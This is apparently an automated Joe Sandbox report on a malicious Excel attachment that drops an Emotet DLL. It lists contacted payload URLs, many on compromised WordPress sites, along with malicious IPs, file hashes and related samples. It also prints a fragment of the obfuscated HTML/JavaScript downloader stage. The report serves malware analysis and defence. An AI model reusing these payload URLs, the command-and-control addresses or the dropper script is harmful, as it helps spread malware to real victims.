Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ayoobeducationaltrust.in	139.59.58.214	true	true	10%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/vvv/ppp/fe.png	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/vvv/ppp/fe.html	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.240.118.168/vvv/ppp/fe.htmlWinSta0	mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/vvv/ppp/fe	powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://cmit.valestudios.com/wp-admin/RueGJ41A/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://sellin.ap	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://91.240.118.168/vvv/ppp/fe.htmlv1.0	mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://test.drea	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://bawelnianka.cfolks.pl/wp-content/Ttv/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://91.240.11	powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	low
http://ayoobeducationaltrust.in	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://160.16.102.168:80/gYIhzpB	rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://huculek.f	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://160.16.102.168:80/gYIhzpA	rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.168/vvv/ppp/fe.pngPE3	powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://cmit.valestudios.com/wp-a	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/vvv/ppp/fe.htmlmshta	mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://test.valestudios.com/wp-c	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.protware.com/	mshta.exe, 00000004.00000003.424245582.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449466418.0000000003EAB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424110567.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424721967.0000000003407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.444232743.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449284684.000000000340B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449350682.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425017595.0000000003408000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://160.16.102.168:80/gYIhzp	rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.2	364453688149503140239183.xls.0.dr	true	Avira URL Cloud: safe	low
http://test.dreamcityorlando.com	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crm.compracasaenhouston.c	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		high
http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.240.118.168/vvv/ppp/fe.htmlC:	mshta.exe, 00000004.00000002.448978311.0000000000598000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://curvygirlsboutique.com/jf	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/vvv/ppp/fe.html3	mshta.exe, 00000004.00000003.447334668.0000000000536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447356395.000000000053E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448911645.0000000000542000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://test.vale	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crm.compr	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://lynsmithgroup.com/hftm2i2	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html	mshta.exe, 00000004.00000003.426086113.0000000003205000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://160.16.102.168:80/gYIhzpz	rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sellin.app/wp-admin/S2cDPYXNKEnT/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://test.dreamcityorlando.com/t0mmx/xBBXi/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://www.protware.com	mshta.exe, 00000004.00000003.424599420.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447384053.00000000033C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sellin.app/wp-admin/S2cDP	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://160.16.102.168:80/gYIhzpK	rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cmit.vale	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://160.16.102.168:80/gYIhzpH	rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.240.118.168/vvv/ppp/fe.html17	mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://91.240.118.168	powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://thesocialagent.net/b/MO5A	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ayoobeducationaltrust.in/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://bawelnianka.cfolks.pl/wp-	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://huculek.futurehost.pl/ima	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		high
http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3	powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://91.240.118.168/vvv/ppp/fe.htmlfunction	mshta.exe, 00000004.00000003.426307315.000000000320D000.00000004.00000800.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
185.157.82.211	unknown	Poland	42927	S-NET-ASPL	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
79.172.212.216	unknown	Hungary	61998	SZERVERPLEXHU	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
173.214.173.220	unknown	United States	19318	IS-AS-1US	true
212.24.98.99	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
178.63.25.185	unknown	Germany	24940	HETZNER-ASDE	true
160.16.102.168	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
51.15.4.22	unknown	France	12876	OnlineSASFR	true
159.89.230.105	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
162.214.50.39	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
91.240.118.168	unknown	unknown	49453	GLOBALLAYERNL	true
200.17.134.35	unknown	Brazil	1916	AssociacaoRedeNacionaldeEnsinoePesquisaBR	true
217.182.143.207	unknown	France	16276	OVHFR	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
51.38.71.0	unknown	France	16276	OVHFR	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
139.59.58.214	ayoobeducationaltrust.in	Singapore	14061	DIGITALOCEAN-ASNUS	true
131.100.24.231	unknown	Brazil	61635	GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
162.243.175.63	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
192.254.71.210	unknown	United States	64235	BIGBRAINUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
104.168.155.129	unknown	United States	54290	HOSTWINDSUS	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
209.59.138.75	unknown	United States	32244	LIQUIDWEBUS	true
159.8.59.82	unknown	United States	36351	SOFTLAYERUS	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562430
Start date:	28.01.2022
Start time:	21:29:03
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	364453688149503140239183.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@25/9@1/47
EGA Information:	Successful, ratio: 75%
HDC Information:	Successful, ratio: 21.1% (good quality ratio 18.4%) Quality average: 67.6% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 54 Number of non-executed functions: 197
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 92.123.101.235, 84.53.177.19
Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
Execution Graph export aborted for target mshta.exe, PID 2840 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3004 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:29:23	API Interceptor	54x Sleep call for process: mshta.exe modified
21:29:28	API Interceptor	438x Sleep call for process: powershell.exe modified
21:29:47	API Interceptor	147x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	CJ68000754184.xls	Get hash	malicious	Browse
	imedpub_2.xls	Get hash	malicious	Browse
	imedpub_6.xls	Get hash	malicious	Browse
	imedpub.com_6.xls	Get hash	malicious	Browse
	imedpub.com_10.xls	Get hash	malicious	Browse
	iMedPub LTD_10.xls	Get hash	malicious	Browse
	iMedPub LTD_12.xls	Get hash	malicious	Browse
	iMedPub LTD_14.xls	Get hash	malicious	Browse
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse
	iMedPub LTD_15.xls	Get hash	malicious	Browse
	iMedPub LTD_2.xls	Get hash	malicious	Browse
	iMedPub LTD_3.xls	Get hash	malicious	Browse
	iMedPub LTD_7.xls	Get hash	malicious	Browse
	iMedPub LTD_8.xls	Get hash	malicious	Browse
	imedpub.xls	Get hash	malicious	Browse
	InnovincConf_1.xls	Get hash	malicious	Browse
	innovinc.org.xls	Get hash	malicious	Browse
	ANFg7r0v2A.dll	Get hash	malicious	Browse
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse
	Innovincconferences.xls	Get hash	malicious	Browse
185.157.82.211	CJ68000754184.xls	Get hash	malicious	Browse
	imedpub_2.xls	Get hash	malicious	Browse
	imedpub_6.xls	Get hash	malicious	Browse
	imedpub.com_6.xls	Get hash	malicious	Browse
	imedpub.com_10.xls	Get hash	malicious	Browse
	iMedPub LTD_10.xls	Get hash	malicious	Browse
	iMedPub LTD_12.xls	Get hash	malicious	Browse
	iMedPub LTD_14.xls	Get hash	malicious	Browse
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse
	iMedPub LTD_15.xls	Get hash	malicious	Browse
	iMedPub LTD_2.xls	Get hash	malicious	Browse
	iMedPub LTD_3.xls	Get hash	malicious	Browse
	iMedPub LTD_7.xls	Get hash	malicious	Browse
	iMedPub LTD_8.xls	Get hash	malicious	Browse
	imedpub.xls	Get hash	malicious	Browse
	InnovincConf_1.xls	Get hash	malicious	Browse
	innovinc.org.xls	Get hash	malicious	Browse
	ANFg7r0v2A.dll	Get hash	malicious	Browse
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse
	Innovincconferences.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ayoobeducationaltrust.in	Insight Medical Publishing_8.xls	Get hash	malicious	Browse	139.59.58.214
	Ommega Publishers_1.xls	Get hash	malicious	Browse	139.59.58.214
	OPAST GROUP LLC_2.xls	Get hash	malicious	Browse	139.59.58.214
	Opast International.xls	Get hash	malicious	Browse	139.59.58.214
	Opast Publishing Group_4.xls	Get hash	malicious	Browse	139.59.58.214
	Opast Publishing Group_5.xls	Get hash	malicious	Browse	139.59.58.214
	Opast Publishing Group_6.xls	Get hash	malicious	Browse	139.59.58.214
	Report.xls	Get hash	malicious	Browse	139.59.58.214
	Form.xls	Get hash	malicious	Browse	139.59.58.214

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
S-NET-ASPL	CJ68000754184.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub_2.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub_6.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub.com_6.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub.com_10.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_10.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_12.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_14.xls	Get hash	malicious	Browse	185.157.82.211
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_15.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_2.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_3.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_7.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_8.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub.xls	Get hash	malicious	Browse	185.157.82.211
	InnovincConf_1.xls	Get hash	malicious	Browse	185.157.82.211
	innovinc.org.xls	Get hash	malicious	Browse	185.157.82.211
	ANFg7r0v2A.dll	Get hash	malicious	Browse	185.157.82.211
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	185.157.82.211
	Innovincconferences.xls	Get hash	malicious	Browse	185.157.82.211
OnlineSASFR	80_513972285.xls	Get hash	malicious	Browse	195.154.146.35
	Attachment-2801.xls	Get hash	malicious	Browse	195.154.146.35
	CJ68000754184.xls	Get hash	malicious	Browse	51.15.4.22
	DOCUMENT_2801.xls	Get hash	malicious	Browse	195.154.146.35
	DETAILS-145.xls	Get hash	malicious	Browse	195.154.146.35
	imedpub_2.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub_6.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub.com_6.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub.com_10.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_10.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_12.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_14.xls	Get hash	malicious	Browse	51.15.4.22
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_15.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_2.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_3.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_7.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_8.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub.xls	Get hash	malicious	Browse	51.15.4.22
	info_301.xls	Get hash	malicious	Browse	195.154.146.35

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\QWER.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.9805281108446335
Encrypted:	false
SSDEEP:	12288:B2AavzUBPSczbeeTLjvGyMwWd3DYr6i64/:OUBPSczbeeTnv6ZDWA
MD5:	29389EBE59F75F143BC38D8932E06808
SHA1:	D5370F203FD1A34F4B4A5AAE58C2EEE0B39F864B
SHA-256:	AB46128507884F34AA46ADEDB1266B5D3DCD09EB39D657E3FAE7A97B870B8350
SHA-512:	CC9645B935093040758099B9B8E0C201B35D4CA2638E3BC0B71E03412F16259583E32E1559E123B64D9FB72C1A795CDE26022927756BCC4943718CC336316408
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	downloaded
Size (bytes):	10938
Entropy (8bit):	6.175530209677761
Encrypted:	false
SSDEEP:	192:aYheCkQRsqy+PVnH7GZ6oK3i8jcTWaIpWOOKesH5n8rM5eZoE2dwIUuaQkPNKtXi:aYdkexPZy9K3i0cTOdDewnTE2+Io1liS
MD5:	B44D97C843AE9C7EE5C2DFAEC0E71745
SHA1:	FE1DBDC7AE560D8062D4537E078D466D405EA5C5
SHA-256:	45F1EB0D5B17B378AC2F50D05E1B29D4D8070791690E63C23C8AC720D4FD4C36
SHA-512:	91CF71B8C949A3580D49BBC9FD776853ACB561710B30F6D26D01F53031BECF7AFEC924736DD8DC810D10F90F97E6D0FB1985EE0ABA5D28BE4B194D2128ACFEDC
Malicious:	false
Reputation:	unknown
IE Cache URL:	http://91.240.118.168/vvv/ppp/fe.html
Preview:	.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';r1L4h2W4JYYeJ=new Array();bWx6JIowwnOsh=new Array();bWx6JIowwnOsh[0]='e\106\113F%34%36C%31' ;r1L4h2W4JYYeJ[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.%.6.1}..2.%.2.0}

C:\Users\user\AppData\Local\Temp\4B14.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF61981CC6FBEE46E0.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
